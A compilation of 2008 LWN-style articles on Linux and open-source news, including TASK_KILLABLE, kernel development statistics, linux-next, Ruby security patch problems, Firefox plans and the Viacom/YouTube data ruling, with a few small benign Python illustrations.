Linux which is not necessarily supplied by the vendor.  


But other sectors still seem to see the ability for the customer to put (or
replace) Linux on their systems the way DEC saw Unix in the early 1980s.
They see no value in letting their customers make changes to their systems,
choosing instead to lock those systems down and keep total control.
Embedded systems are often singled out as an example of this type of
behavior, and vendors of small routers tend to be especially inclined in
this way.  It is not a coincidence that a substantial portion of the
high-profile GPL-enforcement cases to date have involved consumer-level
routers.


Some vendors, at least, are getting smarter and doing what they need to do
to avoid licensing problems.  But relatively few of them welcome customers
who want 
to replace the software on "their" devices.  There are exceptions, though,
and their number just grew with this announcement from Netgear.
The WGR614L router looks like a fairly straightforward consumer wireless
router, with the usual set of features.  LWN readers will doubtless be glad
to hear that it is "Works with Windows Vista" certified.  It has a
four-port Ethernet switch, an 802.11g access point, a mighty
240 MHz CPU, and 16MB of RAM: all of the stuff one would expect from
an inexpensive desktop device.


But what makes this device interesting is that it's designed to be open and
hackable.  The source code for the factory-installed firmware is available
from Netgear's community web
site; it's amusingly packaged as a zip file containing a single,
compressed tarball which, in turn, holds a bleeding-edge 2.4.20 kernel
tree.  But anybody wanting something a bit more contemporary and
community-oriented can replace that firmware altogether with a package like Tomato or DD-WRT; indeed, Netgear
almost seems to encourage its customers to do so.


Every one of those customers then gets the benefit of the effort which has
gone into the development of those router distributions - with little
effort required on Netgear's part.  Those customers can improve this
platform and make their changes available to other customers; that makes
Netgear's hardware more valuable.  If there are bugs in the system, a
single motivated customer can fix them and make those fixes available to
everybody else.  And all of this comes at almost no cost to Netgear.


It is always fun to see Linux turn up in new places.  It's now a routine
experience to realize that one's new television, camcorder, music player,
or automobile runs Linux.  But locked-down, Linux-based devices are not far
removed from the fully proprietary systems which preceded them.  Whether or
not one agrees that locking down systems in this way is legally or morally
defensible, it's easy to conclude that it is undesirable.  A Linux system
which is cast in concrete loses a part of the vital energy which makes
Linux what it is.


So it is always a welcome development when a vendor decides to take a more
open path.  With any luck at all, the wider public will eventually realize
that more open devices are more powerful devices, and, as a result, such
devices will prove more successful.  That is the path that brings us more
control over our systems and, eventually, to World Domination.

		A look at openSUSE 11.0


openSUSE 11.0 was released
about two weeks ago, to generally good reviews.  TuxMachines ran some lighthearted
tests last fall and again recently, comparing the latest Mandriva
release with the latest openSUSE release.  This time around openSUSE edged
out Mandriva in a near tie.  Other good reviews can be found on LinuxPlanet,
DownloadSquad
and many other places around the web.

There are plenty of options for getting a
hold of this release.  You can buy a boxed set, an option that has all but
disappeared from the Linux distribution scene.  The box comes with complete
end-user documentation, installable media for 32-bit and 64-bit systems,
plus 90 days of end-user installation support.

Most people will probably download the release in one form
or another.  Choose from the 32-bit, 64-bit or PowerPC platforms.  Get a
DVD, a live CD or use a network install.  The live CD comes in a GNOME or a
KDE version.  There's plenty of documentation online to go along with that:
release notes, the openSUSE 11.0 startup document and the step-by-step
installation guide.

The KDE live CD only contains KDE 4.  If you would prefer KDE 3.5, it is
available on the DVD or the network install.  Benjamin Weber has a blog post
on the inclusion of KDE4.  "There should be a KDE3.5 installable
livecd.  This was not produced as there were insufficient resources to
produce and test three installable livecds. Someone can always step up and
help produce one."

Xfce 4.4 is also available for those who want something lighter than
either GNOME or KDE.  Other applications available in this release include
Firefox 3.0, OpenOffice.org 2.4, Banshee 1.0 and Wine 1.0.  KIWI LTSP is
the LTSP5 implementation on openSUSE.  The previous openSUSE release added
Giver, an easy GTK+ file-sharing tool.  This release includes Kepas, a KDE
application for file-sharing.

Underneath all that you'll find Linux 2.6.25.4, AppArmor 2.3, Xen 3.2.1
RC1, Alsa 1.0.16, glibc 2.8 branch, binutils 2.18.50 SVN, cmake 2.6, gcc
4.3 branch, gdb 6.8, Perl 5.10, ConsoleKit 0.2.10, CUPS 1.3.7, D-Bus 1.2.1,
NetworkManager 0.7 SVN, PackageKit 0.2.1, PolicyKit 0.7, PulseAudio 0.9.10,
Samba 3.2pre2 and X.org 7.3.  These and other highlights are listed here.

Those familiar with openSUSE will notice that the installer and the package
management have been overhauled for this release.  NetworkManager has also
been improved and should autodetect an EVDO card without any major
problems.

Of course it's impossible to squash all bugs, but the Most Annoying
Bugs 11.0 list is quite short and most have workarounds.

All in all, this looks like a great release for openSUSE.

		TASK_KILLABLE


Like most versions of Unix, Linux has two fundamental ways in which a
process can be put to sleep.  A process which is placed in the
TASK_INTERRUPTIBLE state will sleep until either
(1) something explicitly wakes it up, or (2) a non-masked signal
is received.  The TASK_UNINTERRUPTIBLE state, instead, ignores
signals; processes in that state will require an explicit wakeup before
they can run again.


There are advantages and disadvantages to each type of sleep.
Interruptible sleeps enable faster response to signals, but they make the
programming harder.  Kernel code which uses interruptible sleeps must
always check to see whether it woke up as a result of a signal, and, if so,
clean up whatever it was doing and return -EINTR back to user
space.  The user-space side, too, must realize that a system call was
interrupted and respond accordingly; not all user-space programmers are
known for their diligence in this regard.  Making a sleep uninterruptible
eliminates these problems, but at the cost of being, well,
uninterruptible.  If the expected wakeup event does not materialize, the
process will wait forever and there is usually nothing that anybody can do
about it short of rebooting the system.  This is the source of the dreaded,
unkillable process which is shown to be in the "D" state by ps.
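
For those who would rather not read through ps output, here is a rough sketch of how such processes might be found by reading /proc directly.  It assumes the usual /proc/&lt;pid&gt;/stat layout, with the process ID, the command name in parentheses, and then a one-letter state; the function names are hypothetical.

```python
import os


def parse_stat_state(stat_line):
    """Return (pid, comm, state) from the contents of /proc/<pid>/stat.

    The command name is wrapped in parentheses and may itself contain
    spaces or parentheses, so split on the last ')' instead of whitespace.
    """
    open_paren = stat_line.index("(")
    close_paren = stat_line.rindex(")")
    pid = int(stat_line[:open_paren])
    comm = stat_line[open_paren + 1:close_paren]
    state = stat_line[close_paren + 1:].split()[0]
    return pid, comm, state


def uninterruptible_processes(proc_root="/proc"):
    """List (pid, comm) for every process currently in the "D" state."""
    found = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "stat")) as f:
                pid, comm, state = parse_stat_state(f.read())
        except OSError:
            continue  # the process exited while we were looking
        if state == "D":
            found.append((pid, comm))
    return found
```

A process which turns up here once is probably just waiting for disk I/O; one which stays on the list across repeated runs is a candidate for the wedged state described above.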


Given the highly obnoxious nature of unkillable processes, one would think
that interruptible sleeps should be used whenever possible.  The problem
with that idea is that, in many cases, the introduction of interruptible
sleeps is likely to lead to application bugs.  As recently noted by Alan Cox:


	Unix tradition (and thus almost all applications) believe file
	store writes to be non signal interruptible. It would not be safe
	or practical to change that guarantee.


So it would seem that we are stuck with the occasional blocked-and-immortal
process forever.

Or maybe not.  A while back, Matthew Wilcox realized that many of these
concerns about application bugs do not really apply if the application is
about to be killed anyway.  It does not matter if the developer thought
about the possibility of an interrupted system call if said system call is
doomed to never return to user space.  So Matthew created a new sleeping
state, called TASK_KILLABLE; it behaves like
TASK_UNINTERRUPTIBLE with the exception that fatal signals will
interrupt the sleep.

With TASK_KILLABLE comes a new set of primitives for waiting for
events and acquiring locks:


For each of these functions, the return value will be zero for a normal,
successful return, or a negative error code in case of a fatal signal.  In
the latter case, kernel code should clean up and return, enabling the
process to be killed.

The TASK_KILLABLE patch was merged for the 2.6.25 kernel, but that
does not mean that the unkillable process problem has gone away.  The
number of places in the kernel (as of 2.6.26-rc8) which are actually using
this new state is quite small - as in, one need not worry about running out
of fingers while counting them.  The NFS client code has been converted,
which can only be a welcome development.  But there are very few other
uses of TASK_KILLABLE, and none at all in device drivers, which is
often where processes get wedged.

It can take time for a new API to enter widespread use in the kernel,
especially when it supplements an existing functionality which works well
enough most of the time.  Additionally, the benefits of a mass conversion
of existing code to killable sleeps are not entirely clear.  But there are
almost certainly places in the kernel which could be improved by this
change, if users and developers could identify the spots where processes
get hung.  It also makes sense to use killable sleeps in new code unless
there is some pressing reason to disallow interruptions altogether.

		The OLPC project releases 10GB of sound samples


The One Laptop Per Child project
recently released a large collection of
sound samples:


Loops, Grooves, Licks, Stings, Hits, Pads, Melodic Motives/Themes/Phrases, Sound-Effects, City and Country Soundscapes, Motors, Machines, Toys, Guns, Explosions, Swords, Armor, Cars, Jets, Pot & Pans, Acoustic and Synthetic Noises, Acoustic and Electronic Drums, Voices, Western and World Instruments, Real and Human Animals, Industrial and Natural Ambiences, Film and Game Foley, and more, more, more! This huge collection of new and original samples have been donated to Dr. Richard Boulanger @ cSounds.com specifically to support the OLPC developers, students, XO users, and computer and electronic musicians everywhere. They are FREE and are offered under a CC-BY license for downloading and use in your teaching, your demos, your research, your music, your remixes, your songs, your games, your videos, your slideshows, your websites, and your XO activities.


The sample collection comes from a number of sources including the
Open Path Music recording label, Zenph Studios (a musical software
company), the Berklee College of Music, the Berklee Music Synthesis
Alumni, Berklee Shares.com, the Worldwide Community of Csound Developers,
Teachers and Users and Dr. Richard Boulanger.


The sample collection is somewhat random in nature, though there are
similarities in the material from the various sources, such as many
single notes from common musical instruments.
The recording quality tends to be decent, although a percentage of the
sound samples have audible hum, hiss, aliasing issues and
rough beginnings or endings.
All of the samples are recorded in mono and are available in
several sample rates.  The samples have also had their volumes
normalized.
An obvious improvement to the collection would involve compressing
the samples with FLAC
to save disk space.
The majority of the samples have durations of a few seconds or less,
but there are also a number of longer selections taken from long ambient
recordings or groupings of short sounds.


The sound descriptions for the various collections are somewhat
generic; the best way to get a good understanding of the entire library is
to download a group of sub-collections and play through the various
sounds.  Having a few gigabytes of empty disk space is a good idea.
Unleashing a random audio file player on the collection
can be amusing, if somewhat annoying after a while.
Your editor listened to a random selection from the first seven
sections of the Berklee College of Music Sampling Archive;
the collection is quite diverse.


One can imagine a number of possible uses for such a large library of
sounds.  Adding audio to games is an obvious use for the sounds.
One could create accessibility applications for the visually impaired.
In keeping with the OLPC theme, a teacher could sort through the
sounds and use them for educating children about animals, musical
instruments and other things that they may not experience in daily life.
On the artistic side, the samples could be put to good use making
audio tracks and movies.  With the appropriate sample playing
software, new and interesting musical instruments could be created.


If your software project has a need for some open-licensed audio
clips, the OLPC collection is a good source.  Producing
a large collection of sounds such as this would involve many
hours of work.


		Ruby security flaws expose release process problems


Some serious integer overflows in the Ruby language were recently
discovered and fixed, but the process has left some in the community
unhappy about how it was done.  One of the biggest problems was that the
official patched versions of the language broke its signature application:
Rails.  The overflows may lead to arbitrary code execution, which left
some users in a quandary, trying to decide whether to close known holes in
the language or to keep their web applications running.


There still seems to be some question about whether the holes are
exploitable or not, but one thing is abundantly clear: they were fixed in
the public CVS several days before any kind of security announcement was
made.  It was made worse by referring to the CVE numbers in the commit
message.  For anyone looking for a possibly exploitable Ruby flaw—one
that had yet to be publicly announced—that would be a glaringly
obvious place to start.


When a release and announcement
went out, some of the versions specified would cause Rails, the web
application framework, to segfault.  No new updates have been posted to the
Ruby language web site, leaving
distributions and users to fill in the gap.  Some frantic scrambling can be
seen on a thread on
the ruby-talk mailing list as folks with production Rails applications cast
about for solutions.


Part of the problem may stem from the number of separate language versions
the Ruby team is trying to support.  Three stable versions (1.8.5, 1.8.6,
and 1.8.7) as well as one development version (1.9.0) are all affected by
these vulnerabilities.  Unfortunately, all four of the updated packages had
one or more problems that either didn't fix all of the vulnerabilities or
broke Rails.  Those are still the versions suggested as a fix as of this
writing. 


The new versions were based on the latest code in the CVS tree which
evidently had not been tested completely.  There are several test suites
available for Ruby and Rails that would have caught these problems, but
they apparently were not run.  It is certainly important to get security
fixes out quickly, but introducing other vulnerabilities and/or
incompatibilities with existing code is a rather high price to pay.
As is waiting ten (and counting...) days for a proper fix from upstream.


For the most part, Linux distributions have resolved the problem for
themselves by either backporting the fixes into the version they already
support or by fixing the updated version provided.  For example, Fedora 9
has done three separate releases to fully resolve the problem, the first to
upgrade to the suggested upstream version (1.8.6p230), a second to resolve
a segfault introduced somewhere between p114 and p230, and a third to
handle the problem of Rails being broken.


There is some indication that the Ruby team does not consider the flaws to
be exploitable for code execution but, if so, they are still clearly
denial-of-service vulnerabilities.  The continued silence, at least on the
official website, should also give one pause.  The release process for Ruby
seems to have fairly serious holes in it.  This has caused some to issue a plea for a release
process on the ruby-core mailing list. 


In addition, Dominique Brezinski claims that these bugs or some that were
closely related were disclosed
several years ago (see comment 43) and essentially ignored at that
time.  This is disconcerting for a language that is being increasingly used
in web applications and other internet-facing services.  One can only hope
that this incident will serve as a wake up call to the Ruby developers.
Failing that, if additional incidents like this occur, it may instead serve
as a wake up call for those who depend on Ruby.


		Some development statistics for 2.6.26 - and beyond


When 2.6.26-rc1 was released, your editor noted that, at a mere 7500
commits, it looked like 2.6.26 would be a smaller than usual development
cycle.  Interestingly, though, 2.6.26 has caught up.  As of this writing
(waiting for 2.6.26-rc9), this development cycle has incorporated 10,102
changesets for a net addition of 169,439 lines of code to the kernel.  That
makes it still significantly smaller than 2.6.25, but it is by no means
small.  The developer base remains as broad as ever: 1065 developers
(representing some 150 companies) have contributed to 2.6.26; just over 1/3
of those developers contributed one single changeset.
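
Numbers like these can be approximated by anybody with a kernel repository.  What follows is a minimal sketch, not the tooling your editor actually uses; it assumes one author name per commit as input, such as the output of "git log --format=%an" over the release range, and the function names are hypothetical.

```python
from collections import Counter


def changesets_per_author(author_lines):
    """Count changesets per author from one author name per commit."""
    return Counter(line.strip() for line in author_lines if line.strip())


def single_changeset_share(counts):
    """Fraction of developers who contributed exactly one changeset."""
    if not counts:
        return 0.0
    singles = sum(1 for n in counts.values() if n == 1)
    return singles / len(counts)
```

Counting by author name alone is crude; the same developer may appear under more than one name or address, so real results need some cleanup before they can be trusted.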

The 2.6 development model says that the bulk of the changes should be
merged during the merge window (before the -rc1 release), with only fixes
coming thereafter.  Here's how things break down for recent releases:


So, while the bulk of the big patches enter the kernel during the merge
window, at least 25% of the total - and often more - come thereafter.
That's a lot of fixes. 


So who were the most active developers this time around?  Here's the top
20:


In terms of the number of changesets merged, Harvey Harrison got to the
top of the list with a wide variety of janitorial fixes.  Bartlomiej
Zolnierkiewicz continues to put significant effort into cleaning up the IDE
subsystem, even though most distributors have moved away from that code and
are using the newer PATA layer instead.  Glauber Costa has been tirelessly
working in the x86 architecture code; in particular, he continues to work
toward the goal of unifying the 32-bit and 64-bit code to the greatest
extent possible.  Adrian Bunk has made a career of cleaning up the code
base and eliminating unneeded code.  And Joe Perches dedicated much time to
eliminating warnings from the checkpatch.pl script.

There have been complaints from the developers that the volume of "cleanup"
patches is reaching a point that it is drowning out the rest and
interfering with "real work."  We're seeing some of that volume here, with
three of the top five changeset contributors doing cleanup work - some of
which is seen to be more valuable than the rest.

On the lines changed side, we see a mostly different set of developers.  In
this case, the top slots were earned by deleting code.  Stephen Hemminger
finally succeeded in getting rid of the old sk98lin driver.  Adrian Bunk
tore out the bcm43xx driver, the ieee80211 software MAC layer, the
xircom_tulip_cb driver, and various other bits and pieces.  David Miller
removed a bunch of old SPARC code, but replaced it with various other
facilities; he also took the PowerPC low-level memory manager and made it
generic.  Steven Toth works in the Video4Linux layer; he added some new
drivers and a bunch of cleanups.  Ben Hutchings added the Solarstorm
SFC4000 driver.


When one thinks about 2.6.26 features, the things that come to mind include
KGDB, almost-ready network namespaces, almost-ready mesh networking
support, a working (shall we say "almost ready"?) realtime group scheduler,
read-only bind mounts, page 
attribute table support, the object debugging infrastructure, and, of
course, the vast pile of new drivers.  One has to look hard to find the
developers behind that work in the lists above (some of them are certainly
there).  Which just reinforces an important point: there is interest and
information in counting changesets and lines changed, but the correlation
between those numbers and serious accomplishments in kernel programming is
weak at best.  Unfortunately, "real work" is awfully hard to measure in any
sort of automated way.


So what the heck; we'll go back to the numbers we can measure.  Here are the
most active companies for 2.6.26:


This list tends not to change too much from one release to the next; in
particular, the top companies are always the same.  


If we look at who is attaching Signed-off-by tags to code they didn't
write, we get a sense for who the gatekeepers to the kernel are.  These are
the developers and companies who are herding code into the mainline:


Once again, these numbers tend not to change that much from one development
cycle to the next.  Subsystem maintainers do not change often.


What's next?

This is the first full development cycle where the linux-next tree was in
operation.  At this stage in the cycle, linux-next should look very much
like 2.6.27 - or, at least, 2.6.27-rc1.  Your editor pulled the July 2
linux-next tree and ran some statistics; this tree contains 6527 changesets
from 619 developers.  Just over 400,000 lines of code are touched, with a
net addition of 38,000 lines.


If linux-next is to be believed, the most active 2.6.27 developers will be:


These numbers reflect a number of the larger developments which can be
expected for 2.6.27: incredible amounts of KVM work, the merging of the
UBIFS filesystem, the ftrace tracing framework, a lot of reworking of the
TTY layer, a lot of firmware thrashing, and ongoing big kernel lock removal
work.


It will be most interesting to see how these numbers compare with what
actually shows up in 2.6.27-rc1.  Recent numbers suggest that quite a few
patches will hit the mainline without having been in the linux-next tree -
either that, or 2.6.27 will be a relatively small release.  If nothing
else, we will see which developers do not yet get their work into
linux-next for integration testing ahead of the merge window.

		Mozilla plans for Firefox 3 and beyond


The gift wrap is scarcely off Firefox 3 and the Mozilla community is
already looking toward its next update. The first alpha release
of Firefox 3.1, codenamed Shiretoko, may be released as early as this
month, while its final release might see the light of day by year's
end. Let's take a look at where this popular Internet browser is headed in
the coming months, and what new features users can expect to see.


Several features were nearly included in Firefox 3.0 but didn't make
the cut because they weren't completely ready. New
features expected to be in version 3.1 include a history and bookmark
organizer with unified search and smart folder capabilities, and visual tab
switching that shows thumbnail images of the web sites opened in each tab
when moused over; both were set aside in favor of other, more
critical features.


According to an email sent to the mozilla.dev.planning mailing list by
Mozilla's Vice President of Engineering, Mike Schroepfer, there are other
features expected to make it into version 3.1. For instance, native JSON
DOM bindings (preferred by web developers over their JavaScript
counterparts), an improved Awesomebar, support for cross-site
XMLHttpRequest for the development of more powerful web applications,
and better system integration are a few of the features Mozilla is anxious
to get into the hands of users.


Schroepfer says, "This, along with the overall quality of Gecko 1.9 as a
basis for mobile and the desire to get new platform features out to web
developers sooner has [led us] to want to do a second release of Firefox
this year."


If a feature isn't ready by version 3.1's targeted ship date, Schroepfer
says, it will simply be included in the next major release rather than
holding up this one.


In a recent blog post, Schroepfer says the new decision to aim for
shorter, date-driven release cycles is in large part due to Mozilla's
desire to "deliver releases of the quality and impact of Firefox 3 with
much greater frequency." More frequent indeed; the gap between the
releases of Firefox 2.0 and 3.0 was almost two years.


Not surprisingly, Firefox 4 is expected to usher in a whole host of
changes, not the least of which is the introduction
of Mozilla2, "an extensive update to the Mozilla platform to feature
highlights like ActionMonkey, the merge of Mozilla's JavaScript engine
(SpiderMonkey) and Tamarin, Adobe's JavaScript virtual machine open-sourced
in late 2006."


Details of the features expected to ship with Firefox 4 are sketchy, but
the Vice President of Mozilla Labs, Chris Beard, has two projects currently
under development that he'd like to see
included: Weave and Prism.


Weave is similar to the wildly popular browser synchronization add-on,
Foxmarks. While Foxmarks only syncs an
individual's bookmarks across machines, Weave's goal is to replicate a
user's entire browsing experience - including bookmarks, favorites,
passwords, and preferences - no matter where they access the
Internet.


Prism takes aim at Google Gears by making browser
functionality available even while offline. Previously known as WebRunner,
Prism is based on an idea called site-specific browsers (SSB), which is
already implemented in Fluid for Mac OS X, Adobe Air, and Microsoft
Silverlight. Prism team member Matthew Gertner explains,
"Rather than running programs in normal web browsers like Firefox or
Safari, wedged in a tab between New York Times articles and TechCrunch
posts, each app is given its own dedicated browser, which is customized to
include many of the desktop features that users know and love." For a taste
of what Prism can do within Firefox 3, download this extension.


Of course, one of the biggest questions on the minds of many people
these days is: what's up with the mobile version of Firefox? Although it
looks like there's a ways to go before Mobile Firefox turns up on your Razr
or BlackBerry, the rapid release cycle of Firefox will help push the
project along. Schroepfer says, "There are already devices shipping with
early versions of Gecko 1.9 at the core. More are coming soon and we'll be
releasing milestones of full branded versions of Firefox (with XUL and the
Firefox team taking a lead in the user experience) later this year. This
lines up well with Firefox 3.1 and a synchronized release schedule will
make everything run more smoothly."


The development team is working on sorting through some of the basic
differences among mobile devices such as a touch screen versus non-touch
screen interface, virtual versus tactile keyboards, and so on. If you're
interested in trying out the prototypes, they're available on the team's
wiki page.


Firefox 3 has been downloaded more than 8
million times since its release on June 17th, and more than 90% of
users download the latest version of the browser within
7 days of its release. Clearly, Firefox has a large and growing user
base, no doubt due in large part to Mozilla's willingness to offer new and
useful features in a timely fashion.

		Notes on the Viacom ruling


Google's purchase of YouTube always seemed questionable to some observers:
it looked as if Google were buying itself a whole new source of copyright
lawsuits.  One of the benefits of that purchase came through on
July 2, when a U.S. District Court ordered Google to hand over its
complete set of YouTube traffic logs, containing information about every
video viewed on the service.  See
Groklaw for the full text of the order.  If this order stands (and it
appears that Google will not appeal it), millions
of users worldwide will have their viewing data handed over to a litigious
entertainment industry company.  There are a couple of important implications
to draw from this turn of events, so LWN will venture a little far afield
and take a look.


The data involved includes, for each video viewed, the time, which video
was involved, which YouTube user account was used, and the IP address the
request came from.  Viacom claimed that the privacy of YouTube users is not
threatened by this release of data, and the court agreed.  But account
names can be correlated across sites, and IP addresses (especially
time-correlated IP addresses) can easily identify exactly who was watching
a particular video.  Viacom promises it would never use this data to launch
enforcement actions against individuals; the fact that the company feels
the need to make that promise suggests that Viacom feels it could
use this data to that end.


One other interesting aspect of the ruling which has been commented upon
less is this: Google has also been ordered to hand over every video which
has been removed from the site.  Once again, that is a great deal of data.
It also drives home the point that, on a site like YouTube, nothing is
really removed: all of those "removed" videos are still there, waiting for
some company with enough lawyers to go after them.


All of this data is to be handed over regardless of what jurisdiction the
users thought they were in.  Nobody's privacy or data retention laws apply
here.  This is a worldwide compromise of personal data.


So lesson number one is obvious: attending to one's personal security
requires being very careful about the data tracks that one leaves on other
people's servers.  Regardless of any site's privacy policy or any country's
data sharing laws, that data is there for the grabbing.  The course of
events which led to the compromise of vast amounts of video-viewing data
can also lead to the disclosure of electronic mail, accounting data, online
chat sessions, purchase histories, software downloads, or which edgy Second
Life neighborhood one likes to hang out in.  Indeed, records of video
viewing activity are more strongly protected in the U.S. than many other
types of data; other types of information may well prove easier to get.
What we leave on remote
machines seems to stay there indefinitely, and it's an open book for those with
sufficient legal power on their side.


The second lesson is for anybody running a publicly-available server, as
many LWN readers do.  The video activity database being grabbed by Viacom
is said to be about 12 terabytes deep - before getting into the
"removed" videos.  It should not be surprising that a data stash of that
size would attract this kind of action.  If you gather together that much
information on the behavior of many millions of people, somebody,
somewhere, is going to try to get their hands on it.  How could it possibly
be any other way?


Not enough people are asking this question: why does Google/YouTube hold
that much data about its users?  Why does it retain the ability to replay
their actions years after the fact?  And why do "removed" videos not go
away?  If that data did not exist in the first place, there would be no
question of disclosing it to an attacking corporation.  A company which
keeps that amount of data around is prioritizing whatever commercial value
it sees in that data over the privacy and security of its users.  And, by
inviting raids from corporations (which we hear about) and governments
(which we might not hear about), such companies are not helping their own
security either.


So there are strong arguments for simply not retaining all that data in the
first place.  Naturally, some governments are doing their best to force
that kind of retention, but that's a different battle.  In the absence of
legal constraints, a standard policy mandating short data retention periods
makes a lot of sense.  It behooves all of
us to think about what kind of data we leave lying around - either through
our activities or by facilitating the activities of others - and to keep it
to a minimum.  The most secure data is data which does not exist.


		The current development kernel is...linux-next?


One of the development process advantages brought by git (and by BitKeeper
before it) is the ability to see the up-to-the-second, bleeding-edge status
of Linus's tree.  So any developer who wants to know where the front edge
of development lies can grab that tree and make patches fit into it.  But
the value of the mainline repository for development would appear to be
less than it once was.  The mainline is no longer where the action is.

Consider, for example, this response
from Andrew Morton after finding that a patch posted to linux-kernel
would not compile for him:


	I assume this patch was prepared against some ancient out-of-date
	kernel such as current Linus mainline.  Guys, we have a new
	development tree now.


He followed up with this statement:


	But what I am repeatedly seeing is people cheerfully raising 2.6.27
	patches against the 2.6.26 tree when we have a nice 2.6.27 tree for
	developing against.  Those days are over, guys.


So the message would appear to be clear: development work should be done
against the linux-next tree rather than against the mainline kernel.  There
are some clear advantages to having work done in this way.  Patches
developed against linux-next should merge cleanly during the next merge
window.  Developers will be testing each other's trees as they work,
causing bugs to turn up earlier in the process.  And, of course, Andrew
won't have to complain about patches which fail to build for him - at
least, not as often.

Linux-next is a somewhat strange base on which to try to develop, though.
It is built anew every day from over 100 subsystem trees, each of which
can, itself, change from one day to the next.  So linux-next is a moving
target, just like the mainline is.  But, unlike the mainline, linux-next
has no consistent or coherent history.  Every day's linux-next tree is a
completely new creation with a unique - and transient - history.


Consider a developer who bases some work on a mainline release -
2.6.26-rc9, say.  That developer's work will be derived from a specific
commit in the mainline tree, known as
b7279469d66b55119784b8b9529c99c1955fe747 in this case.  The history from
2.6.26-rc9 is well defined, and that series of patches can be merged into
any other repository which also contains 2.6.26-rc9; the identity of that
commit is consistent and immutable across all repositories.  With such a
development tree, it is (relatively) easy to track the mainline as it
advances, and to merge one's work when the time comes.  A git tree based on
the mainline sits on a solid foundation.


It is not possible to base a tree on linux-next in the same way.
Development can begin at a specific commit, but tomorrow's linux-next tree
may not contain that commit at all.  The various component trees will have
advanced independently of the previous day's linux-next tree, which can, in
itself, complicate things.  But the process of making all those trees
come together can involve tasks like moving patches from one tree to another, or
fixing intermediate patches which break things.  That makes the end result
better, but at the cost of rebasing those trees.  Rebasing completely
rewrites the development history, causing the old history to disappear from
the tree.  So a patch series based on the previous history loses its
foundation. 
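
The effect of rebasing on commit identity can be illustrated with a small model.  What follows is a minimal sketch, not git itself: it assumes only that a commit's ID is a hash covering both the change and the ID of its parent (real git hashes more fields, such as the tree, author, and dates).  The function names, base names, and patch descriptions are all made up for the illustration.

```python
import hashlib


def commit_id(parent_id, patch):
    """Hash the parent ID together with the patch text.

    This loosely mimics how a git commit ID covers its ancestry;
    it is a simplification, not git's actual object format.
    """
    data = (parent_id + "\n" + patch).encode("utf-8")
    return hashlib.sha1(data).hexdigest()


def build_history(base_id, patches):
    """Apply patches in order on top of base_id; return the commit IDs."""
    ids = []
    parent = base_id
    for patch in patches:
        parent = commit_id(parent, patch)
        ids.append(parent)
    return ids


# Hypothetical patch series; the contents do not matter for the model.
patches = ["fix locking in foo", "add bar driver"]

# Same base, same patches: every repository computes the same IDs.
monday = build_history("base-A", patches)
also_monday = build_history("base-A", patches)

# The same patches rebased onto a different base get entirely new IDs.
tuesday = build_history("base-B", patches)
```

In this model, `monday` and `also_monday` are identical, which is why work based on a fixed mainline commit merges cleanly elsewhere.  The `tuesday` list shares no IDs with `monday`, even though the patches themselves have not changed; anything built on one of Monday's commits has nothing to attach to in Tuesday's tree.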


And, since linux-next is built from its components every day, a patch
developed on top of linux-next may, when integrated into that tree, be
merged somewhere in the middle of the sequence; in other words, the patch
will be merged into a tree which differs considerably from the tree on
which it was developed.  As Stephen Rothwell, the maintainer of the
linux-next tree, put it:


	One downside of the way linux-next works is that, because it is
	recreated every day, you cannot really base anything on it that is
	to be merged into it.


Another interesting aspect of linux-next development involves API changes.
The longstanding rule in kernel development is that internal kernel
interfaces can be changed if there is a good reason to do so, but that the
person making the change is obligated to fix all in-tree code broken by
that change.  If an API change is introduced into linux-next, though, the
developer is simply not able to fix any code which enters linux-next by way
of the other subsystem trees.  If the developer does get patches for the
API change into those trees, the trees can no longer be built on top of
kernels which lack that change - the mainline, for example.  API changes
have, in other words, become harder to do - a situation which some may see
as a good thing.

What all this means is that API changes must be handled through techniques
like the creation of backward-compatibility layers; those layers can then
be removed a development cycle or two later once the transition is
complete.  Or changes can be split up and added to individual subsystem
trees; that, however, can lead to interesting ordering dependencies between
the trees.  In some cases, we are seeing 2.6.27 changes being merged into 2.6.26 in stub form as a way
of making all of the pieces fit together.

Then, there is the simple matter that developers like to have a stable base
upon which to create their code.  The linux-next tree, since it contains
large amounts of relatively new code, will also contain its share of new
bugs.  That makes developers, who are often having enough trouble just
tracking down their own bugs, somewhat grumpy.  Development against the
mainline tends to have a lower probability of forcing developers to look
for bugs which are not of their own making.

Many of these complaints have an easy answer: the pain which comes from
making all the pieces fit together in linux-next must be faced at some
point anyway.  The real difference is that linux-next allows those problems
to be dealt with at leisure, while the older "merge everything in the
mainline" model compressed much of that work into the merge window.  How
beneficial that really is will be seen for the first time in the 2.6.27
merge window; if linux-next is serving its intended function, 2.6.27 should
come together with rather less hassle than its immediate predecessors did.


But, regardless of the value provided by linux-next for integration and
testing purposes, the fact remains that it is a difficult platform upon
which to develop patches.  That process is somewhat like building a house
on a sand bar; overnight the tide comes in and completely reshapes the land
underneath you.  That is why most (possibly all) of the subsystem trees
used to assemble linux-next are, themselves, based on the mainline.


The solution to that problem will have to evolve over time.  The linux-next
tree is a new institution which is still finding its proper place in the
development process.  Easier ways to develop patches against the linux-next
tree will certainly be worked out; it may well turn out that quilt-like 
tools work better for this task than git.  For now, linux-next is an
excellent integration and testing resource, but it has not quite yet
managed to become the true Linux kernel development tree.

		Enhanced printk() merged


A change very late in the development cycle for 2.6.26 provides a framework
for extending printk() to handle new kinds of arguments.  Linus
Torvalds just merged the change—after -rc9—presumably
partially because he knew he could trust the author, but also because it
should have no
effect on the kernel.  It will provide for better debugging output once
code is changed to take advantage of it.


The core idea is to extend printk() so that kernel data structures
can be formatted in kernel-specific ways.  In order to get some
compile-time checking, 
the %p format specifier has been overloaded. 
For example, %pI might be used to indicate that the associated
pointer is to be formatted as a struct inode, which could print
the most interesting fields of that structure.  GCC will be able to check
for the presence of a pointer argument but, because it does not understand
the I part, it cannot enforce that it is a pointer of the right type.


Extending printk() in this manner allowed Torvalds—who
authored the patch—to
add two new 
types to printk(): %pS for symbolic pointers and
%pF for symbolic function pointers.  In both cases, the code uses
kallsyms to turn the pointer value into a symbol name.  Instead of
a kernel developer having to read long address strings and then trying to
find them in the system map, the kernel will do that work for them.


The %pF specifier is for architectures like ppc and ia64 that use
function descriptors rather than pointers.  For those architectures, a function
pointer points to a structure that contains the actual function address.
By using the %pF specifier, the proper dereferencing is done.


As an example of how the augmented printk() could be used,
Torvalds converted
printk_address().  The
CONFIG_KALLSYMS dependency and the kallsyms_lookup() were
removed, essentially leaving a one-line function:

If kallsyms is not present, the new printk() just reverts
to printing the address in hexadecimal, which allows the special case
handling to be done there.
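
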